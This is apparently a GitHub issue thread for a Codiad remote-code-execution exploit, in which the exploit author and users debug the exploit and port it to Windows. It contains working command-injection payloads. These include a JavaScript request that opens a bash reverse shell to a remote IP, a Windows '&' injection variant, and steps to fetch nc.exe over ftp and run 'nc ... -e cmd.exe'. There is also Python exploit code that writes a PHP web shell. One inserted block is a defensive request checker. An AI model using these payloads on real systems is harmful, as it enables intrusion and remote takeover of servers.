Codiad-Remote-Code-Execute-Exploit
error on class.filemanager.php line 208
Hey man - I'm coming up against this issue at the moment, any ideas?
Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208
Hi, actually I haven't tested this payload on any Windows server; it works on Linux. But I am a little busy now, so I will tell you how to find the reason for this error. If you have learned PHP, you will be able to debug this error. To solve this problem, you should use the debug functions of PHP, such as print_r, var_dump, ... and see how this error occurred. Thank you.
I got the same error that REPTILEHAUS gets.
@ozgur2357 Okay, I got it, I will review it right now. Thank you for reporting.
@ozgur2357 Could you offer me some information about your operating system version, PHP version or Codiad version? That will help a lot in solving this problem. Thank you, bro.
@WangYihang Of course: Windows 7 Professional Edition Service Pack 1, PHP version 5.6.12 with XAMPP.
Look, I just changed the source code of the file ROOT/components/filemanager/class.filemanager.php at line 244,
then used exploit.js to exploit it, and the browser reported:
Notice: Undefined index: type in C:\phpStudy\PHPTutorial\WWW\components\filemanager\class.filemanager.php on line 238
but the evil code actually has been executed.
My environment is:
php 5.4.45
windows 10
codiad 2.8.3
I got the reason: I had not added the GET arg type in the URL, but this arg does not affect our getting a reverse shell; you can see the evil command has actually been executed.
The main reason that you didn't get a reverse shell is that the evil code is written for Linux (because Windows does not have bash).
This exploitation is based on a technique named command injection, but it sometimes doesn't work on Windows OS. Maybe we can search the web with keywords such as "command injection on windows".
Look, I got some way to inject commands on the Windows platform, just like this:
```
C:\phpStudy\PHPTutorial\WWW>find -L .\ -iregex "*" & dir & echo "*"
找不到文件 - -L
找不到文件 - .\
找不到文件 - -IREGEX
驱动器 C 中的卷没有标签。
卷的序列号是 CE19-C138
C:\phpStudy\PHPTutorial\WWW 的目录
2017/12/23 23:41 <DIR> .
2017/12/23 23:41 <DIR> ..
2017/07/26 01:53 567 .editorconfig
2017/07/26 01:53 173 .gitignore
```
The old exploitation is designed for Linux, because we are able to inject commands with \n on the Linux platform:
```javascript
ip="8.8.8.8";
port="8888";
$.get(
"/components/project/controller.php?action=get_current",
function(d){
p=JSON.parse(d)['data']['path'];
$.post(
"/components/filemanager/controller.php?action=search&path="+p,
{"search_file_type":"\"\n/bin/bash -c 'sh -i >&/dev/tcp/"+ip+"/"+port+" 0>&1'\ngrep \"",}
);
}
);
```
So, we just need to change the exploit to make it fit Windows:
```javascript
ip="8.8.8.8";
port="8888";
command="dir";
$.get(
"/components/project/controller.php?action=get_current",
function(d){
p=JSON.parse(d)['data']['path'];
$.post(
"/components/filemanager/controller.php?action=search&path="+p,
{"search_file_type":'*"&'+command+'&echo "'}
);
}
);
```
Unfortunately we cannot get the output of the command dir. How can we prove it? Using ping, just give it a try.
So I change the var command to command="ping SERVER_IP"; then use tcpdump to listen on the server SERVER_IP.
Got it, now we are able to execute any command on the Windows platform, cool.
That's so cool, let's try to find some way to get a reverse shell on Windows. Because the Windows platform does not have bash, we cannot use the bash built-in function to build a reverse shell; maybe we can use python or other binaries, or we can use PowerShell to generate a reverse shell.
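As an added defensive example (not code from this thread, from Codiad or from the exploit repository), the check below inspects a request to the filemanager search action for the two injection shapes discussed above, a newline in search_file_type on Linux and `&` as the cmd.exe separator on Windows, and for the missing `type` query parameter behind the "Undefined index: type" notice; the sample requests are constructed.

```python
# Defensive request check for Codiad's filemanager search endpoint (added
# example, not code from Codiad or the exploit repository). It flags the two
# injection shapes discussed above: a newline in search_file_type (Linux),
# '&' as cmd.exe separator (Windows), plus the missing 'type' query parameter
# that produces the 'Undefined index: type' notice reported in this issue.
from urllib.parse import parse_qs, urlsplit

SEARCH_PATH = "/components/filemanager/controller.php"
# Characters that have no place in a file-type glob or search string that
# class.filemanager.php concatenates into a find/grep command line.
BAD_CHARS = {
    "\n": "newline (Linux command separator)",
    "&": "ampersand (cmd.exe command separator)",
    '"': "double quote (breaks out of the quoted argument)",
    ";": "semicolon", "|": "pipe", "`": "backtick", "$": "dollar sign",
}

def inspect_search_request(url, body):
    """Return findings for one request (url = path + query string as logged,
    body = raw x-www-form-urlencoded POST body); [] means nothing odd."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    if parts.path != SEARCH_PATH or query.get("action") != ["search"]:
        return []
    findings = []
    # The Codiad UI sends 'type' with every search; the exploit omits it,
    # which is exactly what triggers the PHP notice reported in this issue.
    if "type" not in query:
        findings.append("missing 'type' parameter on search action")
    form = parse_qs(body, keep_blank_values=True)  # decodes %0A, %26, %22
    for param in ("search_file_type", "search_string"):
        for value in form.get(param, []):
            for ch, why in BAD_CHARS.items():
                if ch in value:
                    findings.append(f"{param} contains {why}")
    return findings

# Constructed sample requests (not captured traffic): a legitimate search,
# a Linux-style newline injection and a Windows-style '&' injection.
BASE = SEARCH_PATH + "?action=search&path="
SAMPLES = {  # name: (url, body)
    "benign": (BASE + "/var/www/workspace/demo&type=0",
               "search_string=TODO&search_file_type=*.php"),
    "linux": (BASE + "/var/www/workspace/demo",
              "search_string=x&search_file_type=%22%0Aid%0Agrep+%22"),
    "windows": (BASE + "C:/xampp/htdocs/workspace/demo&type=0",
                "search_string=x&search_file_type=*%22%26dir%26echo+%22"),
}
```

The same function can be fed from a WAF or application-level hook that sees the POST body, since the injected characters sit in the form data rather than in the URL.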
Hi WangYihang, yes I managed to ping the way you said, cool, thanks. Now I'm thinking how to get a shell, like you.
How about uploading nc.exe for Windows via FTP? But ftp is an interactive app.
Of course you can use nc.exe or some other binary. You can learn how to download a file with Windows cmd.exe from the following URL:
https://superuser.com/questions/59465/is-it-possible-to-download-using-the-windows-command-line
To download a binary from an FTP server via the PHP function shell_exec, we just need to let it type the following:
```
ftp 192.168.1.143
admin
admin
get nc.exe
quit
```
Then the file will be stored in the current directory, so now we are able to get a reverse shell by using it:
```
nc 8.8.8.8 8888 -e cmd.exe
```
To make this possible, because the ftp client is an interactive app, we should put all the commands into a temp file just like this:
```
admin
admin
get nc.exe
quit
```
How to use it? Yeah, using input stream redirection:
```
ftp 127.0.0.1 < command.txt
```
How to create the file command.txt? Just use:
```
C:\Users\Sun\Desktop\test>echo firstline > command.txt
C:\Users\Sun\Desktop\test>echo secondline >> command.txt
C:\Users\Sun\Desktop\test>type command.txt
firstline
secondline
```
So, that's the solution. Thank you. @ozgur2357 @REPTILEHAUS
Hi Wang, so we should be able to update the code and use it for Windows, right? Can you update your code for Windows 7?
Okay, I will try it these days in many ways. (Replying by email to totoroha's comment above from Mon, Jan 15, 2018, 7:25 AM.)
Hello Wang, I am really interested in this as well. Do you think you will be able to rework the code anytime soon? Any chance to have a Python exploit, Windows based? Many thanks!
@kienast I will try, but actually a lot of Windows servers will not have Python installed... so maybe we should use some cmd built-in commands... to make the exploitation more robust.
No problem, just let us know if someone can test this so we can have a sort of step-by-step guide for a Windows machine. That would be awesome! Thanks
@ozgur2357 @kienast @totoroha @REPTILEHAUS Hey guys, the Windows platform with Codiad (<2.8.4) installed is now exploitable, thanks to @mhaskar's excellent work. (The Python version and the JavaScript version are under development.)
@WangYihang, thanks again man, best of luck and we will keep in touch!
Hi @mhaskar @WangYihang, I am still getting an error saying: Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208 {"status":"error","message":"No Results Returned"}
My environment is Windows running Codiad. Can you please help?
I have edited the code as below:
```python
def exploit(domain, username, password, ip, port, path):
    global session
    url = domain + "components/filemanager/controller.php?action=search&path=%s" % (path)
    #payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+ip+'''%2F'''+port+'''+0%3E%261'%0Agrep+%22SniperOJ'''
    # This is the full payload for windows which escape the command string and execute the command calc.exe
    # You can replace calc.exe with any command , for example you can use the following command to upload php cmd shell with cmd parameter
    payload_windows = '''askar"%26echo "askar" > C:/xampp/htdocs/z2.php echo ""'''
    windows_payload = 'Hacker"%26cmd.exe echo""'
    data = "search_string=Hacker&search_file_type=" + windows_payload
    headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"}
    response = session.post(url, data=data, headers=headers)
    content = response.content
    if content == '''{"status":"error","message":"No Results Returned"}''':
        print "[-] If you see this message immediately, three reasons:"
        print "\t[+] 1. You just have exited the reverse shell."
        print "\t[+] 2. The target server cannot access your vps server."
        print "\t[+] 3. You haven't started listening in port "+port+" on your vps server, so connection fails."
```
Got it, I will check it tonight, and thank you for your report. (Replying by email to anishmi123's comment above from Mon, Mar 12, 2018, 1:59 PM.)
Here are some steps that may be helpful for you:
- Check whether the target file (C:/xampp/htdocs/z2.php) exists. If yes, check its content; if the web shell is written into it, you succeeded! You can use some web shell connection tool to manage the server, such as antSword/中国菜刀 (China Chopper).
- Check whether the target folder (C:/xampp/htdocs/) exists. If not, please replace it with the correct folder which is writable and accessible on the web.
- If you are able to read/write PHP code, please locate the file https://github.com/Codiad/Codiad/blob/master/components/filemanager/class.filemanager.php#L243, then change the shell_exec function to var_dump/print_r/echo or some other print function, then execute the exploit script again; you will just receive the command to execute. I think you can just put the command in your terminal (cmd), and you will figure out the reason. (PS: step 3 is a very important method in debugging or discovering vulnerabilities. You can also use other IDEs with PHP debuggers, such as PHPStorm/Eclipse...)
If you have already followed the three steps and still not found the reason, please inform me. Finally, thank you for your report and keep in touch.
Best
(Sent by email in reply to the comment above from Tue, Mar 13, 2018, 9:45 AM.)